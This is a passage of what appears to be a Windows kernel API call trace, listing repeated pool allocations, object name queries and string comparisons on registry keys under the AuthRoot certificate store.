| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E14DAEC28F0FA1E8E389A4EABEB26C00AD383C3, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E14DAEC28F0FA1E8E389A4EABEB26C00AD383C3 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E66C9841181C08FB1DFABD4FF8D5CC72BE08F02, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E66C9841181C08FB1DFABD4FF8D5CC72BE08F02 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E66C9841181C08FB1DFABD4FF8D5CC72BE08F02, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E66C9841181C08FB1DFABD4FF8D5CC72BE08F02 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E66C9841181C08FB1DFABD4FF8D5CC72BE08F02, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E66C9841181C08FB1DFABD4FF8D5CC72BE08F02 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F783D255218A74A653971B52CA29C45156FE919, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F783D255218A74A653971B52CA29C45156FE919 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F783D255218A74A653971B52CA29C45156FE919, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F783D255218A74A653971B52CA29C45156FE919 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F783D255218A74A653971B52CA29C45156FE919, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F783D255218A74A653971B52CA29C45156FE919 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F8F364FE1589744215987A52A9AD06995267FB5, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F8F364FE1589744215987A52A9AD06995267FB5 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F8F364FE1589744215987A52A9AD06995267FB5, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F8F364FE1589744215987A52A9AD06995267FB5 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F8F364FE1589744215987A52A9AD06995267FB5, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2F8F364FE1589744215987A52A9AD06995267FB5 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3043FA4FF257DCA0C380EE2E58EA78B23FE6BBC1, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3043FA4FF257DCA0C380EE2E58EA78B23FE6BBC1 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3043FA4FF257DCA0C380EE2E58EA78B23FE6BBC1, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3043FA4FF257DCA0C380EE2E58EA78B23FE6BBC1 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3043FA4FF257DCA0C380EE2E58EA78B23FE6BBC1, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3043FA4FF257DCA0C380EE2E58EA78B23FE6BBC1 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30779E9315022E94856A3FF8BCF815B082F9AEFD, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30779E9315022E94856A3FF8BCF815B082F9AEFD | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30779E9315022E94856A3FF8BCF815B082F9AEFD, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30779E9315022E94856A3FF8BCF815B082F9AEFD | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30779E9315022E94856A3FF8BCF815B082F9AEFD, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30779E9315022E94856A3FF8BCF815B082F9AEFD | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30D4246F07FFDB91898A0BE9496611EB8C5E46E5, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30D4246F07FFDB91898A0BE9496611EB8C5E46E5 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
